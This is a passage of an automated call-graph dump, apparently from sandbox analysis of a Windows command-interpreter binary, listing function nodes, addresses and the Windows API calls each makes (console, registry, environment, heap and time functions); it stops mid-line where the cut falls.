18461->18463 18465 ee63bd 448 API calls 18461->18465 18684 eedd98 _get_osfhandle GetFileType 18463->18684 18467 ef1e70 448 API calls 18464->18467 18492 efea3c 18464->18492 18468 efea92 18465->18468 18467->18464 18471 f04840 453 API calls 18468->18471 18469 efea52 18469->18458 18470 efeab1 18473 efeac6 18470->18473 18474 efeab5 _setmode 18470->18474 18477 efea9a 18471->18477 18472 ef1e70 448 API calls 18472->18475 18689 ef62c0 18473->18689 18474->18473 18475->18469 18475->18472 18484 ef0ada exit 18475->18484 18489 efea32 18475->18489 18589 eee310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18475->18589 18598 eec570 18475->18598 18614 eee470 18475->18614 18477->18463 18481 ef1e70 448 API calls 18477->18481 18479 efeacc EnterCriticalSection LeaveCriticalSection 18482 eec570 580 API calls 18479->18482 18481->18477 18488 efeafa 18482->18488 18484->18475 18485 eee2af 4 API calls 18485->18475 18487 ef1e70 448 API calls 18487->18489 18488->18479 18490 efeb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18488->18490 18491 efeb75 18488->18491 18489->18487 18489->18492 18493 eee2af 4 API calls 18490->18493 18491->18492 18494 ef1e70 448 API calls 18491->18494 18495 efeb40 18493->18495 18494->18491 18496 eee470 917 API calls 18495->18496 18497 eee310 12 API calls 18495->18497 18496->18495 18498 efeb54 GetConsoleOutputCP GetCPInfo 18497->18498 18499 eee2af 4 API calls 18498->18499 18499->18488 18501 eee2bc SetThreadUILanguage 18500->18501 18502 eee2ca 18500->18502 18501->18443 18503 eee2ef 18502->18503 18504 eee2d4 GetModuleHandleW 18502->18504 18506 eee307 18503->18506 18507 eee2f3 GetProcAddress 18503->18507 18504->18503 18504->18506 18506->18501 18508 eee30b SetThreadLocale 18506->18508 18507->18506 18508->18443 18511 ef0a31 18510->18511 18512 ef1f91 18510->18512 18516 ef1f1a GetConsoleOutputCP GetCPInfo 18511->18516 18512->18511 18513 ef1fab VirtualQuery 18512->18513 18513->18511 18515 ef1fbd 18513->18515 18514 ef1fc7 VirtualQuery 18514->18511 18514->18515 18515->18511 18515->18514 18517 ef1f39 memset 18516->18517 18518 eff185 GetThreadLocale 18516->18518 18519 ef1f5a 18517->18519 18520 eff196 18517->18520 18518->18520 18519->18450 18521 eff20b 18520->18521 18522 eff1ee memset 18520->18522 18521->18450 18522->18520 18524 eee310 12 API calls 18523->18524 18525 ee884f 18524->18525 18720 eea9d4 GetEnvironmentStringsW 18525->18720 18529 ee885e 18734 ee8273 18529->18734 18532 ee8873 18532->18532 18533 ee8b2f 18532->18533 18755 ef1a05 18532->18755 18535 ee78e4 448 API calls 18533->18535 18537 ee8b42 18535->18537 19054 ef7d18 18537->19054 18538 ee88a5 GetCommandLineW 18539 ee88b8 18538->18539 18760 eee3f0 18539->18760 18544 ee88e1 18771 ee8e9e 18544->18771 18590 eee357 _get_osfhandle GetConsoleMode 18589->18590 18591 eee343 18589->18591 18593 eee372 18590->18593 18596 eee3a0 GetConsoleOutputCP GetCPInfo 18590->18596 18591->18590 18592 eee3bc _get_osfhandle SetConsoleMode 18591->18592 18592->18590 18594 eee3df 18592->18594 18595 eee381 _get_osfhandle SetConsoleMode 18593->18595 18593->18596 18594->18590 18597 efdc1d _get_osfhandle SetConsoleMode 18594->18597 18595->18596 18596->18485 18597->18590 18599 eec594 18598->18599 18600 eec5d3 18598->18600 18599->18600 18601 eec59e GetProcessHeap RtlFreeHeap 18599->18601 18602 eec695 VirtualFree 18600->18602 18603 eec5fe _setjmp3 18600->18603 18601->18599 18601->18600 18602->18600 18607 eec666 18602->18607 18604 eec63c 18603->18604 18610 eec683 18603->18610 20237 eea8c4 18604->20237 18606 eec66f 18606->18610 20266 f08791 18606->20266 18607->18606 20257 f08959 18607->20257 18608 eec64d 18608->18606 20248 eecc70 18608->20248 18610->18475 18612 efd0f0 18612->18612 18615 eee48a 18614->18615 18616 eee517 18614->18616 18615->18616 18617 eee4ae memset 18615->18617 18618 eee4cc 18615->18618 18616->18475 20937 eee670 18617->20937 18620 eee5ad 18618->18620 18621 eee501 18618->18621 18625 eee4d9 18618->18625 18624 eedcd0 448 API calls 18620->18624 18621->18616 18634 eee670 457 API calls 18621->18634 18622 eee4e9 18627 eee4ef 18622->18627 18628 eee531 18622->18628 18623 eee572 20970 ee9ef2 memset 18623->20970 18629 eee5b7 18624->18629 18625->18622 18625->18623 20864 eead60 GetConsoleTitleW 18627->20864 18631 eee55f 18628->18631 18632 eee544 18628->18632 18629->18621 18635 eee627 18629->18635 21075 eeed90 18629->21075 20965 eeab50 18631->20965 18637 eee54c 18632->18637 18638 eee588 18632->18638 18634->18616 21109 ef57ea 18635->21109 18636 eee583 18636->18621 18642 eee554 18637->18642 18643 eee592 18637->18643 21020 ef0390 18638->21020 20952 ef03b0 18642->20952 18648 eee4f6 18643->18648 21023 ef0740 18643->21023 18646 eee631 18646->18621 18653 eedcd0 448 API calls 18646->18653 18648->18621 18651 eea125 2 API calls 18648->18651 18649 eee5dd 18652 eef410 464 API calls 18649->18652 18651->18621 18654 eee5eb 18652->18654 18655 eee641 18653->18655 18654->18635 18656 eee5f0 18654->18656 18655->18621 18657 eee64b 18655->18657 18658 ee9ef2 459 API calls 18656->18658 18659 eeec2e 448 API calls 18657->18659 18660 eee5f9 18658->18660 18659->18656 18660->18621 21079 ef2081 18660->21079 18664 ee790c 448 API calls 18663->18664 18665 ee63dc 18664->18665 18666 f04840 GetStdHandle 18665->18666 18667 ee63bd 448 API calls 18666->18667 18668 f0485e 18667->18668 18669 f048c5 18668->18669 18671 eedd98 6 API calls 18668->18671 18670 ee9950 448 API calls 18669->18670 18672 f048cf 18670->18672 18673 f0486b 18671->18673 18672->18459 18674 f048b5 18673->18674 18675 f04878 FlushConsoleInputBuffer _getch 18673->18675 18676 f04799 448 API calls 18674->18676 18675->18669 18677 f04891 EnterCriticalSection LeaveCriticalSection 18675->18677 18676->18669 18677->18669 22560 ef1ea6 18678->22560 18680 ef1e7c 18681 ef1e82 18680->18681 18682 ee8bc7 446 API calls 18680->18682 18681->18459 18683 ef1e92 GetProcessHeap RtlFreeHeap 18682->18683 18683->18681 18687 eeddca 18684->18687 18688 eeddbd 18684->18688 18685 eeddd6 GetStdHandle 18686 eeddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18685->18686 18686->18688 18687->18685 18687->18686 18688->18470 22568 ef643a NtOpenThreadToken 18689->22568 18692 f01ef3 RtlNtStatusToDosError SetLastError 18694 f01f01 18692->18694 18693 ef6302 18693->18694 18695 f01f51 18693->18695 18696 ef6319 18693->18696 18698 eeab7f 2 API calls 18694->18698 18712 f01fdc 18694->18712 18697 f01f59 GetConsoleTitleW 18695->18697 22577 ef640a FormatMessageW 18696->22577 18700 f01f79 wcsstr 18697->18700 18718 ef63c1 18697->18718 18719 ef6395 18698->18719 18701 f01f92 18700->18701 18700->18718 18703 f01fa0 wcsstr 18701->18703 18702 ef63d8 18707 ef63e9 18702->18707 18708 ef63e2 LocalFree 18702->18708 18703->18703 18703->18718 18704 ef6332 18704->18702 18704->18704 18713 f01f3d 18704->18713 18716 eedcd0 448 API calls 18704->18716 18705 eedc60 2 API calls 18705->18702 18706 ee78e4 448 API calls 18710 f01f4a 18706->18710 18709 ef63f1 18707->18709 18707->18713 18708->18707 18711 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18709->18711 18710->18479 18714 ef6400 18711->18714 18713->18706 18714->18479 18715 ef63b4 SetConsoleTitleW 18715->18718 18717 ef6369 18716->18717 18717->18697 18717->18702 18717->18719 18718->18702 18718->18705 18718->18712 18719->18713 18719->18715 18719->18718 18721 ee8854 18720->18721 18722 eea9e6 18720->18722 18726 ee8b96 GetProcessHeap HeapAlloc 18721->18726 18723 eea9ee GetProcessHeap RtlAllocateHeap 18722->18723 18724 eeaa06 memcpy 18723->18724 18725 eeaa11 FreeEnvironmentStringsW 18723->18725 18724->18725 18725->18721 18727 ee8bb4 18726->18727 18728 efb5ce 18726->18728 18729 eea9d4 5 API calls 18727->18729 18728->18529 18730 ee8bb9 18729->18730 18731 efb5b2 GetProcessHeap RtlFreeHeap 18730->18731 18732 ee8bc3 18730->18732 18733 ee78e4 448 API calls 18731->18733 18732->18529 18733->18728 18754 ee8282 18734->18754 18735 ee82bd RegOpenKeyExW 18736 ee82e1 RegQueryValueExW 18735->18736 18735->18754 18738 ee8321 RegQueryValueExW 18736->18738 18736->18754 18737 ee8552 time srand 18739 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18737->18739 18740 ee8371 RegQueryValueExW 18738->18740 18738->18754 18742 ee8570 GetCommandLineW 18739->18742 18741 ee83ab RegQueryValueExW 18740->18741 18740->18754 18744 ee83fb RegQueryValueExW 18741->18744 18741->18754 18742->18532 18743 efb11a _wtol 18743->18738 18747 ee846c RegQueryValueExW 18744->18747 18744->18754 18745 efb146 _wtol 18745->18740 18746 efb18e _wtol 18746->18741 18747->18754 18748 efb1ba wcstol 18748->18754 18749 efb1dc wcstol 18749->18754 18750 efb218 wcstol 18750->18754 18751 ee84fa RegQueryValueExW 18751->18754 18752 efb28c ExpandEnvironmentStringsW 18752->18754 18754->18735 18754->18737 18754->18738 18754->18740 18754->18741 18754->18743 18754->18744 18754->18745 18754->18746 18754->18747 18754->18748 18754->18749 18754->18750 18754->18751 18754->18752 19058 eeacb0 18754->19058 19068 ef6e25 18755->19068 18757 ef1a27 18758 ef1a2f memset 18757->18758 18759 ee889a 18757->18759 18758->18759 18759->18533 18759->18538 18761 eee405 18760->18761 18769 ee88d9 18760->18769 18762 ef6e25 4 API calls 18761->18762 18763 eee422 18762->18763 18764 eee42d 18763->18764 18765 efdc4a 18763->18765 18766 efdc6b ??_V@YAXPAX 18764->18766 18767 eee441 memset 18764->18767 19080 f034d4 18765->19080 18767->18769 18769->18533 18769->18544 18772 ee8ede towupper 18771->18772 18773 ee8ec1 GetCurrentDirectoryW 18771->18773 19150 eeec2e GetEnvironmentVariableW 18772->19150 18775 ee8ec9 18773->18775 18777 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18775->18777 18778 ee88fc 18777->18778 18780 ef00e9 memset 18778->18780 18779 efb787 towupper 18781 eee3f0 17 API calls 18780->18781 18782 ef013e 18781->18782 18783 ef0146 18782->18783 18784 efe615 18782->18784 18785 efe627 18783->18785 18786 ef0151 GetModuleFileNameW 18783->18786 18787 ef1e70 448 API calls 18784->18787 18789 efe61f exit 18784->18789 19292 eea976 18785->19292 18788 eeec2e 448 API calls 18786->18788 18787->18784 18790 ef0168 18788->18790 18789->18785 18790->18785 18792 ef0170 18790->18792 18794 eeec2e 448 API calls 18792->18794 18793 efe63e 18797 eea976 8 API calls 18793->18797 18795 ef017c 18794->18795 18795->18793 18796 ef0184 18795->18796 18798 eeec2e 448 API calls 18796->18798 18799 efe64f 18797->18799 18800 ef0190 18798->18800 18803 eea976 8 API calls 18799->18803 18800->18799 18801 ef0198 18800->18801 18805 efe660 18803->18805 19055 ef7d1d 19054->19055 19056 ef1e70 448 API calls 19055->19056 19057 ef7d28 exit 19055->19057 19056->19055 19059 eeacc0 19058->19059 19059->19059 19062 eedcd0 19059->19062 19061 eeacd8 19061->18754 19063 eedcde GetProcessHeap HeapAlloc 19062->19063 19064 efd9da 19062->19064 19063->19064 19065 eedcf6 19063->19065 19066 ee78e4 446 API calls 19064->19066 19065->19061 19067 efd9e3 19066->19067 19067->19061 19069 ef6e30 __EH_prolog3_catch 19068->19069 19072 ef742d 19069->19072 19071 ef6e48 19071->18757 19073 ef7441 malloc 19072->19073 19074 ef744f 19073->19074 19075 ef7434 _callnewh 19073->19075 19074->19071 19075->19073 19076 ef7451 19075->19076 19079 ef74d1 ??0exception@@QAE@ABQBDH 19076->19079 19078 ef77ec _CxxThrowException 19079->19078 19083 f0345e 19080->19083 19086 f032e4 19083->19086 19087 f032f6 19086->19087 19094 f02e74 19087->19094 19090 f033a9 19091 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19090->19091 19093 f033ba 19091->19093 19093->18769 19095 f02ea3 19094->19095 19097 f02ead 19094->19097 19096 f0345e 9 API calls 19095->19096 19095->19097 19096->19097 19098 f02f1d GetCurrentThreadId 19097->19098 19099 f02f6c 19098->19099 19100 f03061 19099->19100 19110 f02e37 19099->19110 19103 f03036 OutputDebugStringW 19105 f02fe7 19103->19105 19105->19090 19106 f0392b 19105->19106 19107 f0394c memset 19106->19107 19109 f03941 19106->19109 19108 f0397a 19107->19108 19109->19107 19111 f02e42 19110->19111 19113 f02e4e 19110->19113 19112 f02e5d IsDebuggerPresent 19111->19112 19111->19113 19112->19113 19113->19103 19113->19105 19114 f02859 19113->19114 19118 f02885 19114->19118 19140 f02a23 19114->19140 19115 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19116 f02a60 19115->19116 19116->19103 19117 f0290d FormatMessageW 19119 f02963 19117->19119 19120 f0294c 19117->19120 19118->19117 19118->19140 19122 f03067 _vsnwprintf 19119->19122 19143 f03067 19120->19143 19123 f0295e 19122->19123 19124 f0298e GetCurrentThreadId 19123->19124 19126 f03067 _vsnwprintf 19123->19126 19140->19115 19146 ee9a8d 19143->19146 19147 ee9a98 19146->19147 19148 ee9ab4 19147->19148 19149 ee9afb _vsnwprintf 19147->19149 19149->19148 19151 eeec64 19150->19151 19152 ee8f0d 19150->19152 19151->19152 19153 eeec71 _wcsicmp 19151->19153 19152->18775 19152->18779 19154 eeec87 _wcsicmp 19153->19154 19164 eeed59 19153->19164 19155 eeec9d _wcsicmp 19154->19155 19156 eeed47 19154->19156 19155->19156 19158 eeecb3 _wcsicmp 19155->19158 19199 ee9abf 19156->19199 19157 ee8e9e 436 API calls 19163 eeed6c 19157->19163 19159 efddef GetCommandLineW 19158->19159 19160 eeecc9 _wcsicmp 19158->19160 19159->19152 19162 eeecdf _wcsicmp 19160->19162 19160->19163 19165 eeed24 19162->19165 19166 eeecf1 _wcsicmp 19162->19166 19203 ee6854 19163->19203 19164->19157 19175 ee9310 19165->19175 19168 efddfa rand 19166->19168 19169 eeed07 _wcsicmp 19166->19169 19168->19156 19169->19152 19172 efde06 GetNumaHighestNodeNumber 19169->19172 19170 eeed30 19170->19152 19242 ef6c78 19170->19242 19172->19156 19176 ee93fe 19175->19176 19177 ee933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19175->19177 19176->19170 19245 f048d7 19176->19245 19179 ee938d 19177->19179 19180 efbbd9 19177->19180 19182 efbbcc 19179->19182 19183 ee93cd 19179->19183 19194 efbbd1 19180->19194 19251 ee8791 GetUserDefaultLCID 19180->19251 19184 ee9950 441 API calls 19182->19184 19186 ee9abf _vsnwprintf 19183->19186 19184->19194 19188 ee93d6 19186->19188 19191 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19188->19191 19189 ee9abf _vsnwprintf 19189->19194 19190 efbd10 19192 ee8791 GetUserDefaultLCID 19190->19192 19191->19176 19194->19189 19196 efbdbf 19194->19196 19253 ee998d 19194->19253 19196->19196 19197 efbc11 19197->19190 19197->19197 19198 efbcd0 memmove 19197->19198 19198->19197 19200 ee9acd 19199->19200 19201 ee9aee 19200->19201 19289 ee9afb _vsnwprintf 19200->19289 19201->19164 19204 ee688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19203->19204 19235 ee6b0c 19203->19235 19205 ee68ec 19204->19205 19227 efa562 19204->19227 19207 ee8791 GetUserDefaultLCID 19205->19207 19206 f048d7 6 API calls 19208 efa4c2 19206->19208 19209 ee6906 GetLocaleInfoW 19207->19209 19208->19170 19222 ee6915 19209->19222 19210 efa5f9 19214 ee9abf _vsnwprintf 19210->19214 19211 efa5df realloc 19211->19210 19211->19227 19212 ee6966 19213 ee8791 GetUserDefaultLCID 19212->19213 19215 ee698e GetDateFormatW 19213->19215 19216 efa62a 19214->19216 19217 ee699d 19215->19217 19218 ee6a96 19215->19218 19223 efa63e 19216->19223 19233 efa64d 19216->19233 19217->19218 19226 ee69ab 19217->19226 19220 ee8791 GetUserDefaultLCID 19218->19220 19219 ee78e4 434 API calls 19219->19227 19221 ee6aae GetDateFormatW 19220->19221 19222->19212 19231 efa523 memmove 19222->19231 19234 ee6a75 memmove 19222->19234 19228 ee9950 434 API calls 19223->19228 19226->19216 19227->19210 19227->19211 19227->19219 19238 efa649 19228->19238 19231->19222 19237 ee9950 434 API calls 19233->19237 19234->19222 19235->19206 19237->19238 19291 ef6b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19242->19291 19244 eeed88 19244->19159 19246 f048f0 GetSystemTime 19245->19246 19247 f048fc 19245->19247 19248 f0493b SystemTimeToFileTime 19246->19248 19247->19248 19249 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19248->19249 19250 efbbc7 19249->19250 19250->19170 19252 ee87a5 GetLocaleInfoW 19251->19252 19252->19197 19254 ee99a0 19253->19254 19276 ee99d0 19253->19276 19255 ee9a11 6 API calls 19254->19255 19256 ee99a8 19255->19256 19276->19194 19290 ee9b1f 19289->19290 19290->19201 19291->19244 19293 eea986 19292->19293 19294 eea9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19292->19294 19293->19294 19295 eea9d4 5 API calls 19294->19295 19296 eea9c5 19295->19296 19296->18793 20238 eea8e6 20237->20238 20239 eecc70 548 API calls 20238->20239 20240 eea8f8 20239->20240 20241 eea90c 20240->20241 20242 ef80ba longjmp 20240->20242 20283 eebab0 20241->20283 20244 ef80c8 20242->20244 20296 eed660 EnterCriticalSection LeaveCriticalSection 20244->20296 20246 eea911 20246->18608 20247 ef80cd 20247->18608 20249 eecc7a 20248->20249 20250 eecf10 547 API calls 20249->20250 20251 eecc8a 20250->20251 20252 efd434 longjmp 20251->20252 20253 eecc9b 20251->20253 20252->20253 20253->20253 20254 ee9950 448 API calls 20253->20254 20255 eeccc4 20253->20255 20256 efd45b 20254->20256 20255->18607 20258 f08996 20257->20258 20259 f0898e 20257->20259 20260 f089b2 20258->20260 20261 f089a2 20258->20261 20263 f089db 20259->20263 20264 f089ce longjmp 20259->20264 20260->20259 20265 ee78e4 448 API calls 20260->20265 20262 ee78e4 448 API calls 20261->20262 20262->20259 20263->18606 20264->20263 20265->20259 20282 f087a0 20266->20282 20267 ee9950 448 API calls 20267->20282 20268 f08900 20270 ee9950 448 API calls 20268->20270 20269 f08930 20272 ee9950 448 API calls 20269->20272 20274 f0890f 20270->20274 20271 f088be 20271->20268 20275 f088c3 20271->20275 20276 f0892e 20272->20276 20277 f08925 20274->20277 20278 ee9950 448 API calls 20274->20278 20275->20269 20279 f088d2 20275->20279 20276->18612 20848 f0871d 20277->20848 20278->20277 20855 f086e6 20279->20855 20281 f08791 448 API calls 20281->20282 20282->20267 20282->20268 20282->20269 20282->20271 20282->20276 20282->20279 20282->20281 20292 eebb19 20283->20292 20295 eebac2 20283->20295 20284 eebadc _wcsicmp 20285 eebaf3 20284->20285 20287 eebb68 20284->20287 20288 eebb56 20285->20288 20381 eeccd0 20285->20381 20287->20285 20291 eecc70 548 API calls 20287->20291 20288->20246 20289 eebb15 20289->20246 20290 eecc70 548 API calls 20290->20292 20291->20287 20292->20290 20293 eebb48 20292->20293 20292->20295 20293->20288 20294 eecc70 548 API calls 20293->20294 20294->20295 20295->20284 20295->20285 20297 eed6b0 20296->20297 20298 efd587 20297->20298 20300 eed6c6 EnterCriticalSection LeaveCriticalSection 20297->20300 20301 eed971 20297->20301 20299 efd59b 20298->20299 20302 ee63bd 448 API calls 20298->20302 20691 f0769e 20299->20691 20304 efd5a8 20300->20304 20305 eed6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20300->20305 20669 eeda30 20301->20669 20302->20299 20724 f09fcf _get_osfhandle GetFileType 20304->20724 20308 eed752 20305->20308 20309 eed81c 20308->20309 20313 efd742 memcmp 20308->20313 20320 eed774 20308->20320 20315 eed9f7 GetLastError 20309->20315 20325 eed82c 20309->20325 20310 efd5be 20312 efd6bd 20310->20312 20316 eedd98 6 API calls 20310->20316 20311 eed980 20311->20247 20312->20308 20314 efd6c6 _get_osfhandle 20312->20314 20322 efd6ef GetLastError 20312->20322 20312->20325 20313->20320 20318 f045f9 10 API calls 20314->20318 20315->20325 20317 efd5cd 20316->20317 20317->20312 20319 efd5de 20317->20319 20318->20312 20319->20305 20324 eedd98 6 API calls 20319->20324 20321 efd78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20320->20321 20323 eed7b2 20320->20323 20326 eed7bd SetFilePointer 20320->20326 20321->20323 20331 eed809 20321->20331 20322->20308 20322->20312 20328 eed7ec MultiByteToWideChar 20323->20328 20329 efd7e9 20323->20329 20323->20331 20330 efd5f2 20324->20330 20335 eedd98 6 API calls 20325->20335 20351 eed840 20325->20351 20326->20323 20328->20331 20332 efd7f0 EnterCriticalSection LeaveCriticalSection longjmp 20329->20332 20333 efd6b3 20330->20333 20336 efd607 20330->20336 20331->20309 20331->20332 20332->20325 20333->20305 20334 eed893 20334->20247 20337 efd826 20335->20337 20338 efd61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20336->20338 20339 efd610 20336->20339 20342 f09922 448 API calls 20337->20342 20337->20351 20341 f04191 448 API calls 20338->20341 20725 f07613 _get_osfhandle 20339->20725 20343 efd665 20341->20343 20344 efd84f longjmp 20342->20344 20343->20315 20345 efd66d 20343->20345 20344->20351 20345->20325 20348 efd677 GetLastError 20345->20348 20346 eed8f6 20354 eed9e3 20346->20354 20357 eed904 20346->20357 20347 eed8d7 wcschr 20347->20346 20347->20351 20349 efd69e 20348->20349 20350 efd689 20348->20350 20353 ee9950 448 API calls 20349->20353 20352 ee9950 448 API calls 20350->20352 20351->20334 20351->20346 20351->20347 20356 efd68e longjmp 20352->20356 20353->20325 20354->20301 20361 eed9eb 20354->20361 20355 efd908 20355->20247 20356->20349 20357->20355 20359 eedd98 6 API calls 20357->20359 20358 efd8d3 20360 ee78e4 448 API calls 20358->20360 20363 eed945 20359->20363 20364 efd8df 20360->20364 20361->20358 20362 efd8af 20361->20362 20365 f0769e 458 API calls 20361->20365 20366 ee78e4 448 API calls 20362->20366 20363->20301 20367 eed949 _get_osfhandle SetFilePointer 20363->20367 20368 efd8fb longjmp 20364->20368 20371 eedd98 6 API calls 20364->20371 20369 efd898 20365->20369 20370 efd8be 20366->20370 20367->20301 20378 efd915 20367->20378 20368->20355 20372 ee9950 448 API calls 20369->20372 20373 f09922 448 API calls 20370->20373 20374 efd8f2 20371->20374 20375 efd8a2 20372->20375 20376 efd8c6 longjmp 20373->20376 20374->20368 20730 f0a0da 20374->20730 20377 ee9950 448 API calls 20375->20377 20376->20358 20377->20362 20378->20301 20380 ee998d 448 API calls 20378->20380 20380->20301 20382 eecce9 20381->20382 20383 eecd14 20381->20383 20384 eecde8 20382->20384 20385 eeccf5 20382->20385 20424 eede30 20383->20424 20495 eee090 20384->20495 20388 eecdf2 20385->20388 20389 eecd01 20385->20389 20498 eee210 20388->20498 20393 eecd12 20389->20393 20421 eee230 20389->20421 20391 eecddd 20391->20289 20393->20391 20440 eecf10 _setjmp3 20393->20440 20395 eecd48 20396 efd478 longjmp 20395->20396 20397 eecd59 20395->20397 20398 efd48f 20396->20398 20397->20398 20404 eecd85 20397->20404 20399 ee9950 448 API calls 20398->20399 20400 efd49f 20399->20400 20401 f09922 448 API calls 20400->20401 20402 efd4ac longjmp 20401->20402 20405 efd4ba 20402->20405 20403 eece4a 20407 eecc70 548 API calls 20403->20407 20412 eece61 20403->20412 20416 eece6c 20403->20416 20404->20403 20406 eecdd2 20404->20406 20408 ee9950 448 API calls 20405->20408 20409 eecf10 547 API calls 20406->20409 20407->20403 20411 efd4ca 20408->20411 20409->20391 20410 eedcd0 448 API calls 20413 eece89 20410->20413 20411->20289 20414 eecf10 547 API calls 20412->20414 20413->20400 20415 eece93 20413->20415 20414->20416 20417 eecc70 548 API calls 20415->20417 20416->20391 20416->20410 20418 eeceac 20417->20418 20419 eebab0 574 API calls 20418->20419 20420 eecec6 20418->20420 20419->20420 20420->20289 20422 eeccd0 576 API calls 20421->20422 20423 eee247 20422->20423 20423->20393 20501 eeded0 20424->20501 20426 eede4a 20427 efda16 20426->20427 20428 eede52 20426->20428 20430 eecc70 548 API calls 20427->20430 20519 eee0b0 20428->20519 20433 eede57 20430->20433 20431 eede64 20432 eecc70 548 API calls 20431->20432 20438 eede92 20431->20438 20434 eede75 20432->20434 20433->20431 20436 f08959 449 API calls 20433->20436 20435 eeded0 554 API calls 20434->20435 20437 eede80 20435->20437 20436->20431 20437->20438 20439 eecf10 547 API calls 20437->20439 20438->20393 20439->20438 20441 efd56e 20440->20441 20445 eecf38 20440->20445 20442 eed03b 20443 eed048 20442->20443 20446 ee9950 448 API calls 20442->20446 20443->20395 20444 eecf9e 20449 eed600 532 API calls 20444->20449 20445->20441 20445->20442 20445->20444 20453 eecf86 wcschr 20445->20453 20482 eed0fa 20445->20482 20664 eed600 20445->20664 20448 efd4ca 20446->20448 20448->20395 20450 eecfb7 20449->20450 20452 efd4d2 20450->20452 20456 eecfc7 20450->20456 20451 eecf67 iswspace 20451->20445 20454 eed600 532 API calls 20452->20454 20452->20482 20453->20444 20453->20445 20455 efd4ea 20454->20455 20465 eed600 532 API calls 20455->20465 20457 eecfe2 iswdigit 20456->20457 20459 eed0a6 20456->20459 20463 eed4a7 20456->20463 20456->20482 20458 eecfff 20457->20458 20483 eed341 20457->20483 20466 eed600 532 API calls 20458->20466 20474 eed027 20458->20474 20468 eed0e8 iswdigit 20459->20468 20469 eed0b5 iswspace 20459->20469 20459->20483 20460 eed218 20460->20395 20461 eed600 532 API calls 20461->20483 20462 eed190 20462->20460 20464 ee78e4 448 API calls 20462->20464 20467 eed600 532 API calls 20463->20467 20464->20441 20465->20483 20470 eed2a5 20466->20470 20471 eed4ac 20467->20471 20473 eed310 20468->20473 20468->20482 20469->20457 20472 eed0c7 20469->20472 20479 eed600 532 API calls 20470->20479 20484 eed2ae 20470->20484 20471->20442 20471->20455 20471->20457 20471->20482 20476 eed0d0 wcschr 20472->20476 20472->20482 20475 eed328 iswspace 20473->20475 20473->20483 20474->20395 20480 eed484 20475->20480 20475->20483 20476->20457 20476->20468 20477 eed16d iswdigit 20477->20482 20478 eed1b4 iswspace 20478->20462 20478->20482 20479->20484 20481 eea62f wcschr 20480->20481 20481->20483 20482->20458 20482->20462 20482->20477 20482->20478 20485 eed23e iswspace 20482->20485 20486 eed1d1 wcschr 20482->20486 20490 eed600 532 API calls 20482->20490 20483->20457 20483->20461 20483->20482 20484->20474 20487 eed600 532 API calls 20484->20487 20491 eea62f wcschr 20484->20491 20492 eed426 iswdigit 20484->20492 20485->20482 20488 eed253 wcschr 20485->20488 20486->20462 20486->20477 20489 eed405 iswspace 20487->20489 20488->20482 20489->20484 20490->20482 20491->20484 20492->20474 20493 eed438 20492->20493 20494 eed600 532 API calls 20493->20494 20494->20474 20496 eeccd0 576 API calls 20495->20496 20497 eee0a7 20496->20497 20497->20393 20499 eeccd0 576 API calls 20498->20499 20500 eee227 20499->20500 20500->20393 20514 eedf00 20501->20514 20502 eedf16 iswdigit 20504 eedf27 20502->20504 20502->20514 20503 eedcd0 448 API calls 20503->20514 20507 eedf2f 20504->20507 20508 eecf10 547 API calls 20504->20508 20505 efdaf9 longjmp 20510 eee26b 20505->20510 20506 eedf63 iswdigit 20506->20514 20507->20426 20508->20507 20509 efdaec 20511 f08959 449 API calls 20509->20511 20510->20426 20512 efdaf1 20511->20512 20512->20505 20514->20502 20514->20503 20514->20504 20514->20505 20514->20506 20514->20509 20515 eee059 iswdigit 20514->20515 20516 f08959 449 API calls 20514->20516 20517 eeacb0 448 API calls 20514->20517 20518 eecc70 548 API calls 20514->20518 20591 eea931 20514->20591 20515->20514 20516->20514 20517->20514 20518->20514 20520 eee15b 20519->20520 20521 eee0c1 _wcsicmp 20519->20521 20525 eedcd0 448 API calls 20520->20525 20526 eee1db 20520->20526 20522 eee0dc _wcsicmp 20521->20522 20523 eee203 _wcsicmp 20521->20523 20522->20523 20527 eee0f7 _wcsicmp 20522->20527 20529 ef2a35 20523->20529 20574 ef2a63 20523->20574 20530 eee17d 20525->20530 20531 f08959 449 API calls 20526->20531 20549 eee1e0 20526->20549 20527->20520 20528 eee112 _wcsicmp 20527->20528 20528->20520 20532 eee12d _wcsicmp 20528->20532 20608 eebb90 20529->20608 20534 ef9ca7 20530->20534 20547 eee187 20530->20547 20535 eee1f5 20531->20535 20532->20520 20536 eee144 _wcsicmp 20532->20536 20539 f09922 448 API calls 20534->20539 20535->20433 20536->20520 20537 ef2a47 20542 eecc70 548 API calls 20537->20542 20537->20574 20538 eee1bf 20541 eea8c4 562 API calls 20538->20541 20540 ef9cac longjmp 20539->20540 20557 ee5e22 20540->20557 20545 eee1c9 20541->20545 20546 ef2a5b 20542->20546 20543 eecc70 548 API calls 20543->20547 20544 ee5e1d 20544->20433 20545->20549 20553 eecc70 548 API calls 20545->20553 20623 ee9907 20546->20623 20547->20538 20547->20543 20548 eee1b4 20547->20548 20552 eecf10 547 API calls 20548->20552 20549->20433 20551 ee5da6 448 API calls 20551->20557 20552->20538 20553->20526 20554 ee8f21 448 API calls 20554->20557 20555 ef2a7c _wcsicmp 20560 ef2a92 _wcsicmp 20555->20560 20555->20574 20556 ef2ae4 20558 ef2af4 iswspace 20556->20558 20559 eff500 20556->20559 20557->20544 20557->20551 20557->20554 20562 